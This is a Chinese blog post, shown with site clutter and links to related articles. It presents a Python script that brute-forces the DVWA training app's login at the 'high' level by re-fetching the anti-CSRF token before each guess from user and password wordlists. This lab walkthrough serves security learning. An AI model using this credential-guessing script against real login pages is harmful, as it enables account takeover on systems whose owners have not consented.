DVWA Brute Force漏洞利用(Security Level : high)

最新推荐文章于 2024-09-13 00:14:13 发布
最新推荐文章于 2024-09-13 00:14:13 发布
阅读量1k 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zwlww1/article/details/79370974
版权

由于加入了Anti-CSRFtoken预防无脑爆破,这里就不推荐用Burpsuite了,还是简单用python写个脚本吧。

借用lonehand脚本(python 2.7),用户名为admin,对password参数进行爆破并打印结果,但因为版本问题,获取user_token时需要做出相应调整。调整结果如下:(在原基础上修改了TOKEN获取方式,增加了用户名猜解)

from bs4 import BeautifulSoup
import urllib2
header={
    'Host': '192.168.31.119',
    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language': 'en-US,en;q=0.5',
    'Accept-Encoding': 'gzip, deflate',
    'Referer': 'http://192.168.31.119/DVWA-master/vulnerabilities/brute/',
    'Cookie': 'security=high; PHPSESSID=2afb7fbff91b87660e18dcd0ab1d0ea5',
    'Connection': 'close',
    'Upgrade-Insecure-Requests': '1'}
requrl = "http://192.168.31.119/DVWA-master/vulnerabilities/brute/"

def get_token(requrl,header):
    req = urllib2.Request(url=requrl,headers=header)
    response = urllib2.urlopen(req)
    print response.getcode(),
    the_page = response.read()
    print len(the_page)
    soup = BeautifulSoup(the_page,"html.parser")
    d = soup.find_all('input', attrs={'name':'user_token'})
    user_token = d[0].attrs['value']
    return user_token

user_token = get_token(requrl,header)
i=0
for userline in open("user.lst"):
    for line in open("pass.lst"):
        requrl = "http://192.168.31.119/DVWA-master/vulnerabilities/brute/"+"?username="+userline.strip()+"&password="+line.strip()+"&Login=Login&user_token="+user_token
        i = i + 1
        print i,userline.strip(),line.strip(), 
        user_token = get_token(requrl,header)



zwlww1
关注
DVWA_bruteForce工具_官网下载_Bruter_1.1.zip
09-18
DVWABruteForce板块所需要用到的暴力破解工具。 日常暴力破解小能手。谁用谁知道。
Hikvision海康威视综合安防平台加解密工具!
潇湘信安的博客
09-19 3650
@wafinfo师傅写的一个海康威视综合安防平台后渗透利用工具,可替换sysadmin用户password和salt以及解密数据库的连接密码。
DVWA sql注入(低中高)
m0_73581247的博客
04-08 465
这样我们就能得到和上面初级一样的内容,接下来的和初级类似。因为这里对一些字符进行了转义,需要使用HEX进行转义。都说手动注入烦,直接sqlmap一把梭哈。偶然发现sqlmap还有解密功能。这里我感觉和第一关差不多。太简单了,只给出代码。我就不抓了直接给代码。
DVWA】——Brute Force(暴力破解)
最新发布
HinsCoder的博客
09-13 1449
准备好Brup Suite软件。
DVWA下的CSRF攻防实战(详解)
一期一会的博客
04-20 4763
DVWA下的CSRF攻防实战(详解) 我们简单谈一谈CSRF与XSS的区别: CSRF (cross site request forgery)跨站请求伪造。CSRF是用户在不知情的情况下提交请求,而XSS是用户自己点击链接来访问网页。 整个攻击过程: 用户浏览并登录受信任网站A(dvwa),登录成功以后网站A会返回浏览器的信息中带有已登录的cookie,cookie信息会在浏览器端保存一定时间(根据浏览器设置而定),在用户没有退出网站A的情况下访问恶意站点B(这里在win2003制作一个危险网站),该危
DVWA之命令注入(Command Injection)
qq_39682037的博客
03-22 2150
命令注入(Command Injection) 命令注入是一种攻击,其目标是通过易受攻击的应用程序在主机操作系统上执行任意命令。当应用程序将不安全的用户提供的数据(表格,cookie,HTTP标头等)传递到系统外壳时,可能会发生命令注入攻击。在这种攻击中,攻击者提供的操作系统命令通常是使用易受攻击的应用程序的特权执行的。由于没有足够的输入验证,因此可能会发生命令注入攻击。 Security Lev...
Web漏洞挖掘实验
qq_60730243的博客
12-09 290
1、在使用dvwa靶场时,把Security Level 改为 Low。2、在Command Injection部分,我遇到了一些问题,特别是在使用Ping工具时。我不太了解命令连接符的使用,因此有时会出现错误。3、在进行存储型XSS实验时,要修改maxlength,不然输入框的最大长度不支持输入构造的payload。4、在这次实验中,我学到了许多关于Web漏洞挖掘的知识。我了解了不同类型的漏洞,包括SQL注入、XSS、命令注入和CSRF,以及如何挖掘和利用它们。
DVWA-Brute Force @ Burpsuite.docx
06-27
DVWA-Brute Force @ Burpsuite.docx
DVWA-安装-漏洞测试-漏洞修复指南.docx
05-17
- **漏洞等级**:根据其严重性和利用难度分为low、medium、high三个级别。 - **漏洞测试**:通过模拟攻击的方式验证应用程序中是否存在已知的安全漏洞。 #### 任意命令执行漏洞 1. **漏洞分析**: - 在低级漏洞中...
DVWA-master.zip_DVWA_php_漏洞_靶场
09-24
php攻防练习靶场,多种漏洞组合,练习代码审计,避免开发出现漏洞
DVWA靶场,集成了owasp top 10漏洞
03-28
通过在DVWA中实践,用户能够深入理解漏洞的原理,学习如何识别它们,以及如何利用这些漏洞,进一步提高网络安全防护能力。 OWASP Top 10漏洞包括: 1. A1:注入攻击(Injection) - 这种攻击发生在用户输入的数据...
DVWA:该死的易受攻击的Web应用程序(DVWA
02-05
该死的脆弱的网络应用 该死的易受攻击的Web应用程序(DVWA)是该死的易受攻击PHP / MySQL Web应用程序。 其主要目标是帮助安全专业人员在法律环境中测试他们的技能和工具,帮助Web开发人员更好地理解保护Web应用程序的过程,并帮助学生和教师在受控班级中学习Web应用程序安全性。房间环境。 DVWA的目的是通过简单易用的界面来实践一些最常见的Web漏洞,这些漏洞具有不同的难度。 请注意,此软件同时存在已记录和未记录的漏洞。 这是故意的。 鼓励您尝试发现尽可能多的问题。 警告! 该死的漏洞Web应用程序该死的容易受攻击! 请勿将其上传到托管服务提供商的公共html文件夹或任何面向
【工具-DVWADVWA渗透系列一:Brute Force
qqchaozai的专栏
10-17 5689
前言 DVWA安装使用介绍,见:【工具-DVWADVWA的安装和使用 本渗透系列包含最新DVWA的14个渗透测试样例: 1.Brute Force(暴力破解)2.Command Injection(命令注入)3.CSRF(跨站请求伪造)4.File Inclusion(文件包含)5.File Uploa...
DVWA通关详解
weixin_45808483的博客
11-19 3644
Vulnerability: Brute Force Security level is currently: low. 分析源码: 没有做身份验证 <?php //检查变量是否设置(先看有没有Login参数) if( isset( $_GET[ 'Login' ] ) ) { //获取密码,存入pass变量中 $user = $_GET[ 'username' ]; //获取密码 $pass = $_GET[ 'password' ]; //将密码使用md5加密 $
Kali渗透测试之DVWA系列2——Brute Force(暴力破解)
浅浅的博客
05-11 5162
目录 一、暴力破解原理 二、实验环境 三、实验步骤 安全等级:LOW 安全等级:Medium 暴力破解的四种方式 安全等级:High 安全等级:Impossible 防止暴力破解的有效手段 一、暴力破解原理 暴力破解的原理就是使用攻击者自己的用户名和密码字典,一个一个去枚举,尝试是否能够登录。因为理论上来说,只要字典足够庞大,枚举总是能够成功...
DVWA —— Brute Force 暴力破解
YouTheFreedom的博客
05-20 2541
由于没有对登录页面进行相关的防暴力破解机制,如无验证码、有验证码但验证码未在服务器端校验以及无登录错误次数限制等,导致攻击者可通过暴力破解获取用户登录账户及口令,从而获取网站登录访问权限
DVWA暴力破解(Brute_Force High级别)
热门推荐
liweibin812的博客
01-11 1万+
DVWA调至high级别,发现用之前的暴力破解就不好使了,因为其使用了随机token机制来防止CSRF,从而在一定程度上防止了重放攻击,增加了爆破难度。但是依然可以使用burpsuite来爆破。 1. 将登录请求进行拦截,发现增加了user_token参数,所以爆破要选择两个参数来进行,先将请求发送到intruder。 2. 设置两个参数 password和user_token为变量,攻...
DVWA之暴力破解(Brute Force)Low-->high
weixin_45657361的博客
04-13 1646
DVWA之暴力破解(Brute Force)Low-->high
DVWA SECURITY LEVEL HIGH (python3 brute force)
qq_45106794的博客
11-02 208
import requests from bs4 import BeautifulSoup def getToken(url,header): try: r = requests.get(url,headers=header) print ('响应码:',r.status_code) print ('响应包长度:',len(r.text)) r.raise_for_status(...
DVWA平台任意文件上传攻击演示:漏洞利用与实战操作
- 学习者需在DVWA(Damn Vulnerable Web Application,一个用于安全教育的开源Web应用)平台上操作,将安全级别设置为低,以便更容易模拟漏洞环境。 - 攻击者首先构造恶意代码文件,如cmd.php和phpinfo.php,后者...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值